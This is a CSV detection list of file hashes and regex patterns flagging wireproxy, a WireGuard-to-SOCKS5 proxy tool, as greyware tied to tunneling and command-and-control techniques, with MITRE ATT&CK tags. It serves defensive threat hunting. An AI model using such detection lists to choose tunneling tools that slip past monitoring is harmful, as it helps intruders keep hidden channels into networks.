"*66b52ee470feb8f6d2e6bc138a82d0db8aa59511b3c9f6d44300250ed7273ebc*",".{0,1000}66b52ee470feb8f6d2e6bc138a82d0db8aa59511b3c9f6d44300250ed7273ebc.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*66cb20febb3ce35cfd4bd1320e7abd087c6b23aa457f6e350a8b05fddecc641f*",".{0,1000}66cb20febb3ce35cfd4bd1320e7abd087c6b23aa457f6e350a8b05fddecc641f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*6abb1bc9f730937c6bb77f096087aed70599b3e708fe645dbcf8dfe6240d005d*",".{0,1000}6abb1bc9f730937c6bb77f096087aed70599b3e708fe645dbcf8dfe6240d005d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*6cf85567ac67515da97ff2cfd2adea85a088c5bb4b8eb3fc847d6d3d5637b842*",".{0,1000}6cf85567ac67515da97ff2cfd2adea85a088c5bb4b8eb3fc847d6d3d5637b842.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*7a70080db23b2f02e3304cf2e5d41e75286e28d33b79d0cf514f0161dbe378ea*",".{0,1000}7a70080db23b2f02e3304cf2e5d41e75286e28d33b79d0cf514f0161dbe378ea.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*7ea81ae66bbcb8065d3b7d00c7f67738a4f9fc5c38a28a6cd602552369ea3343*",".{0,1000}7ea81ae66bbcb8065d3b7d00c7f67738a4f9fc5c38a28a6cd602552369ea3343.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*80594939a5a0caa3ae0a8425bb0cc149f1ba31b4dfc15fd183ca2ff1650150ad*",".{0,1000}80594939a5a0caa3ae0a8425bb0cc149f1ba31b4dfc15fd183ca2ff1650150ad.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*84024388bfbdb79a8d084767325ef4b8f25c6551f50a1f9beb2409e73041644f*",".{0,1000}84024388bfbdb79a8d084767325ef4b8f25c6551f50a1f9beb2409e73041644f.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*851dddcb60f2e90bc02a00a056ec9bf8d131082b0d7e3b9b7bf67ac1a381d297*",".{0,1000}851dddcb60f2e90bc02a00a056ec9bf8d131082b0d7e3b9b7bf67ac1a381d297.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*86bd9d5adf837decef7b59ae3a02134103908a249ddd0457f4a688467a42ca63*",".{0,1000}86bd9d5adf837decef7b59ae3a02134103908a249ddd0457f4a688467a42ca63.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*870089165f0603447e099ef6a27cbf0926fda8cbbe1df6fa3c7021897f1eabcc*",".{0,1000}870089165f0603447e099ef6a27cbf0926fda8cbbe1df6fa3c7021897f1eabcc.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*87a0056914c80855f8226b2b23118ed48776bd46a56d1cee328db464ec7502a3*",".{0,1000}87a0056914c80855f8226b2b23118ed48776bd46a56d1cee328db464ec7502a3.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*8ad37d3ba1aeb25f8997349cc4d1ee21540881ebb62249c5b4c95a2a7137dcca*",".{0,1000}8ad37d3ba1aeb25f8997349cc4d1ee21540881ebb62249c5b4c95a2a7137dcca.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*8d9a8c8e646b26d5242d8fa7018bc58147435076d8b9c19fb3df35be786fa2da*",".{0,1000}8d9a8c8e646b26d5242d8fa7018bc58147435076d8b9c19fb3df35be786fa2da.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*8e459ac9f01ef6901b45681fe24dd1abc411a2e35a85a108f9e209d1b0182321*",".{0,1000}8e459ac9f01ef6901b45681fe24dd1abc411a2e35a85a108f9e209d1b0182321.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*905a3126b66ae96cf8171b13f7b727d44971636c1504a496fbd1b7250a491711*",".{0,1000}905a3126b66ae96cf8171b13f7b727d44971636c1504a496fbd1b7250a491711.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*90e0acfe005774296f6b39b88bda3819bb29f0debd6340bc048bfcca38898c8a*",".{0,1000}90e0acfe005774296f6b39b88bda3819bb29f0debd6340bc048bfcca38898c8a.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*94158766003e207f843092ba29787aeb83800799fe9f605682c761d8c75deba7*",".{0,1000}94158766003e207f843092ba29787aeb83800799fe9f605682c761d8c75deba7.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*969a0ad64c9d99f21d8e8a8201fa19b0be3a757d220e89492a4d2f532eeae126*",".{0,1000}969a0ad64c9d99f21d8e8a8201fa19b0be3a757d220e89492a4d2f532eeae126.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*98d3073aff25e6cdb287e366be5de18f461b7e820176a5211dfcf203e8ef6680*",".{0,1000}98d3073aff25e6cdb287e366be5de18f461b7e820176a5211dfcf203e8ef6680.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*a35294253d487a15fd813da9ec51e1f9c71e6ba81a5e19caf2401a87572627de*",".{0,1000}a35294253d487a15fd813da9ec51e1f9c71e6ba81a5e19caf2401a87572627de.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*a48e07ec7e49b7db108e6491d061d118b5c0b52dcf3bbc60390d4b2b9011f8dc*",".{0,1000}a48e07ec7e49b7db108e6491d061d118b5c0b52dcf3bbc60390d4b2b9011f8dc.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*a6990ac66bfbbfeaef787dff39ec08610cca7c77d33747b5a76583e7f7916f2c*",".{0,1000}a6990ac66bfbbfeaef787dff39ec08610cca7c77d33747b5a76583e7f7916f2c.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*a9c55684d85a79c12aea4a9c4c43be98addd32f88c21b240979f47b8c04cca02*",".{0,1000}a9c55684d85a79c12aea4a9c4c43be98addd32f88c21b240979f47b8c04cca02.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*a9fd574e1f0c58461722fc1abc15cd01efb472bcdc1f703de2b918f2fa7dec64*",".{0,1000}a9fd574e1f0c58461722fc1abc15cd01efb472bcdc1f703de2b918f2fa7dec64.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*aea7f25ff97c149ba56c8b4c956d4814269c6c66a5d2a215ef8333ab9499b2da*",".{0,1000}aea7f25ff97c149ba56c8b4c956d4814269c6c66a5d2a215ef8333ab9499b2da.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*b03d96d8d00893f76bd9c55b7ce47750222728e30b19d23e1a39e0239ea6420d*",".{0,1000}b03d96d8d00893f76bd9c55b7ce47750222728e30b19d23e1a39e0239ea6420d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*b39aacc5eb127dab66d1ccbbcbee9ee6cf659d27ebe9cec63c4940754acab7da*",".{0,1000}b39aacc5eb127dab66d1ccbbcbee9ee6cf659d27ebe9cec63c4940754acab7da.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*b673a20bc465d0312a145da0fa9382d990b4f28d2d492452be952a32c1740f50*",".{0,1000}b673a20bc465d0312a145da0fa9382d990b4f28d2d492452be952a32c1740f50.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*b6c43379ca375e18916fd220fb5bb4c76a0bb75c5e83532fa47d6f74aeee61d6*",".{0,1000}b6c43379ca375e18916fd220fb5bb4c76a0bb75c5e83532fa47d6f74aeee61d6.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*b93eda57716e1c55030ac507cbbb9c70b6cfe3d0d5b9041742b4a5e90538a90e*",".{0,1000}b93eda57716e1c55030ac507cbbb9c70b6cfe3d0d5b9041742b4a5e90538a90e.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*bafe621127910335db84dfc38a60088d1aaf6ab52cf2ecebab389457103137b0*",".{0,1000}bafe621127910335db84dfc38a60088d1aaf6ab52cf2ecebab389457103137b0.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*bbe8a83b968e62d2f07b427ca70f48454a33e44250ae43fbe917caf93bc0da26*",".{0,1000}bbe8a83b968e62d2f07b427ca70f48454a33e44250ae43fbe917caf93bc0da26.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*bc19099bd718989cf9f415548edc77044563a512dafeba5a2042626b3238df6d*",".{0,1000}bc19099bd718989cf9f415548edc77044563a512dafeba5a2042626b3238df6d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*bcf09d38544f07d19337c6c7cbf1d12a29f418d0f85cae8c3af17f37b63d5836*",".{0,1000}bcf09d38544f07d19337c6c7cbf1d12a29f418d0f85cae8c3af17f37b63d5836.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*bef4bc1889b6d80b2551b3b3f70feb3df848edf2beb72935129f7e4fba42edc5*",".{0,1000}bef4bc1889b6d80b2551b3b3f70feb3df848edf2beb72935129f7e4fba42edc5.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*bf352b6fb09f15ce5bb29db4f131baa128eb579b157e7ab140682891bae6393b*",".{0,1000}bf352b6fb09f15ce5bb29db4f131baa128eb579b157e7ab140682891bae6393b.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*c46fd158ad7a0dbb616b1c0c5416bb77e43d5aef95869923d62097034d2a1cf7*",".{0,1000}c46fd158ad7a0dbb616b1c0c5416bb77e43d5aef95869923d62097034d2a1cf7.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*c66ea235f3bec5713b4b30abb7fa938c472f9f66b1f1fcaacdf8b0e7c36a735b*",".{0,1000}c66ea235f3bec5713b4b30abb7fa938c472f9f66b1f1fcaacdf8b0e7c36a735b.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*c85dda1fd27eb34db30a297fe5ddfa279904579ce968d8fbe08d68a263c71a8a*",".{0,1000}c85dda1fd27eb34db30a297fe5ddfa279904579ce968d8fbe08d68a263c71a8a.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*cb5d63e74dee2d3908969d245f21722523a3a111f98a3ed13f6554cab98569e3*",".{0,1000}cb5d63e74dee2d3908969d245f21722523a3a111f98a3ed13f6554cab98569e3.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*cfad83c752fa011d705c5a6fa65f0ea4fb99f56209a8b67f9a32629a7f36ee6d*",".{0,1000}cfad83c752fa011d705c5a6fa65f0ea4fb99f56209a8b67f9a32629a7f36ee6d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*d1409d4d6fc200f7f5569b844c0005eb1963a94a857ae4fb5caeb496783cca07*",".{0,1000}d1409d4d6fc200f7f5569b844c0005eb1963a94a857ae4fb5caeb496783cca07.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*d166f3899cc7eb349d9ce4c8adc8f60e3a2908ed29ddf4a2e52e070d78e290ec*",".{0,1000}d166f3899cc7eb349d9ce4c8adc8f60e3a2908ed29ddf4a2e52e070d78e290ec.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*d341e25ece7b66006ffeae3f76194bb12a9d120368f0616e1ab58186dcaff932*",".{0,1000}d341e25ece7b66006ffeae3f76194bb12a9d120368f0616e1ab58186dcaff932.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*d3ac20c9e1aa6062e8454e12f8dcae4bb66ed6bef18e304268196066760947aa*",".{0,1000}d3ac20c9e1aa6062e8454e12f8dcae4bb66ed6bef18e304268196066760947aa.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*d454762487d1118fa84e8931d4ae93bdf0c39fa1f42deb177825eb8d94e8f989*",".{0,1000}d454762487d1118fa84e8931d4ae93bdf0c39fa1f42deb177825eb8d94e8f989.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*d4a4b8c5f774ed28466d584b62cc61f44d2f89f139c7df2e63aefcfc203c2f3a*",".{0,1000}d4a4b8c5f774ed28466d584b62cc61f44d2f89f139c7df2e63aefcfc203c2f3a.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*d6e656ad3fba0ef5630a6607f3b02ee5920085a8fc724e7617d959300d809cab*",".{0,1000}d6e656ad3fba0ef5630a6607f3b02ee5920085a8fc724e7617d959300d809cab.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*d72dd4d052362db7dee1bb2ed177279d4b4f6199288b7a0f9f377accc67e8f01*",".{0,1000}d72dd4d052362db7dee1bb2ed177279d4b4f6199288b7a0f9f377accc67e8f01.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*d9499b5feb59b820c0b9610da94455e1ef96ea018e170261ffabedda39044cce*",".{0,1000}d9499b5feb59b820c0b9610da94455e1ef96ea018e170261ffabedda39044cce.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*dae86be018d5317f61477f260e8508149e769688aa642327fc6caba5786cc26d*",".{0,1000}dae86be018d5317f61477f260e8508149e769688aa642327fc6caba5786cc26d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*db5df4b216cfc30f8a23337a875331dfa29a90ec6d1330aa834bd5eb641c2c6a*",".{0,1000}db5df4b216cfc30f8a23337a875331dfa29a90ec6d1330aa834bd5eb641c2c6a.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*e2ad65bd782f8e3faa19426d408b84ca2d1cd0b4a3d12668febb8d94aca0457c*",".{0,1000}e2ad65bd782f8e3faa19426d408b84ca2d1cd0b4a3d12668febb8d94aca0457c.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*e90c0327bdf81bc4b5ebca4701cd2bfeb5f62a63c2e78e04756e3219ce01d990*",".{0,1000}e90c0327bdf81bc4b5ebca4701cd2bfeb5f62a63c2e78e04756e3219ce01d990.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*ea40a6037ecaaf48b26ef67834d9142e426b84bdb9d7bac5ed62528e0a27cc60*",".{0,1000}ea40a6037ecaaf48b26ef67834d9142e426b84bdb9d7bac5ed62528e0a27cc60.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*eca2eda42fa2d4f71de8055f79066fce3866d22c8f38060ee98978341fd2a078*",".{0,1000}eca2eda42fa2d4f71de8055f79066fce3866d22c8f38060ee98978341fd2a078.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*edb87b5669e9a133f18328402a89242a7844ad244929133803439e95201958d8*",".{0,1000}edb87b5669e9a133f18328402a89242a7844ad244929133803439e95201958d8.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
"*f00e2511ae291bed3ad7e08cfb4cb960ea10e14ef51ba15c928d5d3d14fdb09d*",".{0,1000}f00e2511ae291bed3ad7e08cfb4cb960ea10e14ef51ba15c928d5d3d14fdb09d.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z"
